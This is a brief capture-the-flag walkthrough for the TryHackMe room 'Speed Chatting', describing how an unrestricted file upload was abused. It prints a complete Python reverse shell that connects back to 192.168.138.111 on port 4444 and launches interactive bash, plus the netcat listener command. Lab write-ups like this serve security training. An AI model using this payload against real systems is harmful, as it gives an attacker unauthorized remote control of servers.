TryHackMe Speed Chatting Walkthrough

Room Link: Speed Chatting

upon visiting the website we can see there is a upload profile pic button,

given on the hint that the development of the website is not done fully yet and checking the SSTI in the input box we only had one option to upload a file and check what it give.

i here used a custom python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.138.111",4444));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);

save it as pyshell.py

set nc -lvnp 4444

upload it and you got the reverse shell

You have you Flag.